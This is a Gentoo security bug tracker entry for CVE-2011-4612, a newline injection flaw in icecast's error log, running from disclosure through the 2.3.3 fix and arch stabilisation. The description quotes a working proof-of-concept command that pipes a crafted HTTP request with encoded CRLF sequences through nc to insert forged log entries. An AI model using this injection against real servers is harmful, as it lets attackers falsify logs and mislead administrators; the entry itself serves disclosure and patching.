Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 394847 (CVE-2011-4612)

Summary: <net-misc/icecast-2.3.3: new line injection into log (CVE-2011-4612)
Product: Gentoo Security Reporter: Petr Pisar <petr.pisar>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor CC: barzog, hwoarang, sound
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard: B4 [glsa]
Package list:
Runtime testing required: ---
Bug Depends on: 430434    
Bug Blocks:    

Description Petr Pisar 2011-12-15 19:08:02 UTC
Jamie Strandboge <jamie@canonical.com> reported to icecast developers (CCing <oss-security@lists.openwall.com>) about possibility to inject fake message into icecast error log by specially crafted HTTP request sent to icecast server port discovered by Moritz Naumann:

"Newline injection in error.log

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
> /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815

Upstream responded fixing 2.3.3 version would be released soon.
Comment 1 Tim Sammut (RETIRED) gentoo-dev 2011-12-15 20:54:20 UTC
Thanks for the bug, Petr.
Comment 2 Michael Harrison 2011-12-15 22:45:24 UTC
I was able to reproduce the fake log file with the same info as referenced here:
https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782

netcat must be installed of course
Comment 3 Oleg Gawriloff 2012-07-10 10:24:22 UTC
Any news? Because 2.3.3 is released.
Comment 4 Petr Pisar 2012-07-10 16:58:54 UTC
The 2.3.3 fixes this issue:

r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines
This is part of the patch-set addressing CVE-2011-4612.
Comment 5 Markos Chandras (RETIRED) gentoo-dev 2012-08-06 19:30:58 UTC
2.3.3 now in portage. I can only do a limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.
Comment 6 Sean Amoss (RETIRED) gentoo-dev Security 2012-08-07 22:02:48 UTC
(In reply to comment #5)
> 2.3.3 now in portage. I can only do a limited testing on my webserver so
> please give it a try (or please ATs, test as much as you can) before marking
> it stable.

Thanks, Markos.

Arches, please test and mark stable:
=net-misc/icecast-2.3.3
Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"
Comment 7 Andreas Schürch gentoo-dev 2012-08-08 11:59:13 UTC
I stumbled upon bug 430434.
Comment 8 Andreas Schürch gentoo-dev 2012-08-09 12:01:57 UTC
x86 done, thanks!
Comment 9 Brent Baude (RETIRED) gentoo-dev 2012-08-09 18:21:45 UTC
ppc done
Comment 10 Markos Chandras (RETIRED) gentoo-dev 2012-08-09 20:47:52 UTC
amd64 done
Comment 11 Raúl Porcel (RETIRED) gentoo-dev 2012-08-26 14:12:07 UTC
alpha/sparc keywords dropped
Comment 12 Kacper Kowalik (Xarthisius) (RETIRED) gentoo-dev 2012-09-18 10:09:50 UTC
+  18 Sep 2012; Kacper Kowalik <xarthisius@gentoo.org> icecast-2.3.3.ebuild:
+  ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit
+  RDEPEND

ppc64 stable, last arch done
Comment 13 Sean Amoss (RETIRED) gentoo-dev Security 2012-09-18 18:53:13 UTC
Thanks, everyone. 

GLSA vote: no.
Comment 14 Tim Sammut (RETIRED) gentoo-dev 2012-09-20 23:49:21 UTC
Thanks, folks. GLSA Vote: No, tool, closing.
Comment 15 GLSAMaker/CVETool Bot gentoo-dev 2012-11-20 12:51:11 UTC
CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612):
  icecast before 2.3.3 allows remote attackers to inject control characters
  such as newlines into the error loc (error.log) via a crafted URL.